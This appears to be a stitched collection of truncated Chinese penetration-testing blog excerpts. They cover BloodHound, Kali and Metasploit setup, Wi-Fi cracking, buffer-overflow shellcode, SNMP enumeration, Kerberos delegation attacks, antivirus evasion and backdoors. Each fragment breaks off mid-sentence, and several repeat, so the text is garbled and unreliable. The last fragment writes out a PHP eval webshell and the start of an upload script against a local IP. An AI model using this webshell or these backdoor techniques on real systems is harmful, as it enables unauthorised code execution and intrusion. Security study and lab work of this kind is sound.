一.简介 BloodHound是一款将域内信息可视化的单页的web应用程序,是一款在域内进行信息收集的免费工具: bloodhound通过图与线的形式,将域内用户.计算机.组.会话.ACL以及域内所有的相关用户.组.计算机.登录信息.访问控制策略之间的关系呈现出来. 可供渗透测试人员快速的分析域内情况.拓扑图: 使用bloodhound可以快速.深入地了解活动目录中用户之间的关系,获取哪些用户具有管理员权限.哪些用户对所有的计算机都具有管理员权限.哪些用户是有效的用户组成员信息. 数据分析基于N

0x00  概观 1.BloodHound介绍 BloodHound是一种单页的JavaScript的Web应用程序,构建在Linkurious上,用Electron编译,NEO4J数据库是PowerShell/C# ingestor. BloodHound使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容.攻击者可以使用BloodHound轻松识别高度复杂的攻击路径,否则很难快速识别.防御者可以使用BloodHound来识别和防御那些相同的攻击路径.蓝队和红队都可

1.2 环境安装及初始化 目录(?)[-] 环境安装及初始化 下载映像 安装虚拟机 安装Kali Linux 安装中文输入法 安装VirtualBox增强工具 配置共享目录和剪贴板 运行 Metasploit Framework 启动Kali的PostgreSQL服务 启动Kali的Metasploit服务 在Kali运行msfconsole 小结 在1.1节,我们大致了解了Kali Linux的内置工具集,本节主要介绍虚拟机下的系统安装. 如果您需要定制或者采用其他方式安装系统,请参考官方文档

运行Metasploit Framework 依照Kali Linux网络服务策略,Kali没有自动启动的网络服务,包括数据库服务在内.所以为了让Metasploit以支持数据库的方式运行有些必要的步骤. 启动Kali的PostgreSQL服务 Metasploit 使用PostgreSQL作为数据库,所以必须先运行它. service postgresql start 你可以用ss -ant的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态. State

Kali 安装详细步骤   实验环境 Windows:Windows 10 企业版 VMware:VMware Workstation 12 Pro Kali:kali-linux-2016.2-amd64 软件下载 Windows 下载地址:http://msdn.itellyou.cn/ VMware 百度云链接(含 vmware key):http://pan.baidu.com/s/1c8daaU 密码:s3u2 Kali 百度云链接:http://pan.baidu.com/s/1mh

0x01 前言 我有几个客户在渗透测试之前来找我,说他们的系统安全做得非常好,因为他们的漏洞扫描显示没有严重的漏洞并且已准备好进行安全测试,这使我在15分钟内利用AD中的错误配置获得了域管理员权限. 我在渗透测试领域看到的一个教育缺陷是当前涉及渗透Active Directory(AD)方面缺乏知识.不幸的是,OSCP并没有覆盖AD测试,甚至连sans-gpen课程也很少涉及它.本文的目标是帮助展示我过去在对AD的安全测试中使用的一些技术,工具和方法.这绝不是一遍关于每种方法或工具的综合性手册.

1.更新软件源:修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下适合自己较快的源(可自由选择,不一定要全部): #官方源deb http://http.kali.org/kali kali main non-free contribdeb-src http://http.kali.org/kali kali main non-free contribdeb http://security.kali.org/kali-security k

一.启动Kali的PostgreSQL服务 由于使用PostgreSQL作为数据库,因此,必须先运行它. root@kali:~# service postgresql start 使用ss -ant的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态. 二.启动Metasploit服务 root@kali:~# service metasploit start 三.在Kali运行msfconsole root@kali:~# msfconsole

   1.更新软件源:修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下适合自己较快的源(可自由选择,不一定要全部): #官方源deb http://http.kali.org/kali kali main non-free contribdeb-src http://http.kali.org/kali kali main non-free contribdeb http://security.kali.org/kali-securit

1.更新软件源: 先备份软件源文件 cp /etc/apt/sources.list /etc/apt/sources.list.bak 修改sources.list文件: leafpad /etc/apt/sources.list 然后选择添加以下较快的源: #官方源 deb http://http.kali.org/kali kali main non-free contrib deb-src http://http.kali.org/kali kali main non-free cont

[系统]运行在VMware虚拟机中的Kali Linux系统.(实测Kali运行在virtualbox中兼容性很差,VMware支持的很好.我认为这正是一个不要迷信开源的例子,多数情况下,大公司的商业产品更适合普通用户.) [工具]Aircrack-ng [网卡]淘宝上刚买来的组装RTL8187L无线网卡.(实测我的笔记本自带的无线网卡,无法显示出已连接客户端的BSSID,全都显示为not associated.RTL8187L则是对破解支持很好的网卡.)   [步骤]开启网卡的监听模式: 监听

实验一 目录 直接修改程序机器指令,改变程序执行流程 通过构造输入参数,造成BOF攻击,改变程序执行流 注入Shellcode并执行 问题及解决 思想感悟 一.修改机器指令 首先你需要一个pwn1文件,使用cp命令复制到当前目录下 反汇编,objdump -d pwn1 查看main函数,当前call调用的是foo函数,我们通过修改调用函数的地址使其指向getShell 使用vi pwn1编辑当前文件,并使用:%!xxd将其ASCII码改为16进制显示 使用/d7搜索并找到要修改的相应位置 使用

1.安装snmp服务 2.配置snmp服务 运行Services.msc 添加社区public,只读 启动服务 3.在kali运行 Snmpwalk -c public -v 2c IP 即可查看目标主机的大部分信息.

0x00 前言 在上个月我深入演讲了无约束委派之后,本文将讨论一种不同类型的Kerberos委派:基于资源的约束委派.本文的内容基于Elad Shamir的Kerberos研究,并结合我自己的NTLM研究,提出了一种新的攻击方法,如果您在同一网段中,可以在没有任何凭证的情况下在Active Directory中的任何Windows计算机上将代码执行提升为SYSTEM权限.这是不安全的Active Directory默认滥用的另一个例子,而不是任何新的利用 0x01 攻击TL; DR 如果攻击者在

目录 基础问题 相关知识 实验内容 实验步骤 实验过程中遇到的问题 离实战还缺些什么技术或步骤? 实验总结与体会 实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 返回目录 基础问题 杀软是如何检测出恶意代码的? 基于特征码:如果一个可执行文件(或其他运行的库.脚本等)包

2018-2019-2 网络对抗技术 20165322 Exp2 后门原理与实践 目录 实验准备 后门概念 常用后门工具 实验内容与步骤 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 实验遇到的问题与解决 基

     1.更新软件源:修改sources.list文件:leafpad /etc/apt/sources.list然后选择添加以下适合自己较快的源(可自由选择,不一定要全部): #官方源deb http://http.kali.org/kali kali main non-free contribdeb-src http://http.kali.org/kali kali main non-free contribdeb http://security.kali.org/kali-secur

很多渗透工具都提供了权限维持的能力,如Metasploit.Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为.在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件. 0x01 环境准备 1.软件安装 Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2

本文只是作为知识整理,尽可能的收集一些常用的内网指令.本人原伸手党一枚,希望这些内容对新人有用,大牛可自行忽略. 0x00 内网信息收集 一.单机基础信息收集 如果是获得第一台初始主机的权限的话,我们需要尽可能的多收集当前机器的的信息,包括主机是在域还是在工作组 中.主机所在的内网网段的信息.主机当前的已经运行(和已经安装)的防护软件和监控软件.主机当前的一些活跃 连接.主机上的一些用户信息(若高权限,可以拿到本机的 lsass 进程中的明文密码和本机保存的本地凭证).域 中主机还可以收集更多的

目录 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 5.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 6.基础问题回答 7.实验总结与体会

一  概述 本地 kail  linux 目标 windows nt 服务器 二 过程 首先编写一句话木马  index.php 一句话木马的原理就是把C=xxx 字符串当成php语句执行 注意这里用了GET,因为尝试过POST不成功 <?php eval(@$_GET['c']);?> 编写 上传脚本 index.py import requests base_url='http://192.168.1.4/' url_for_time='index.php?module=eventregi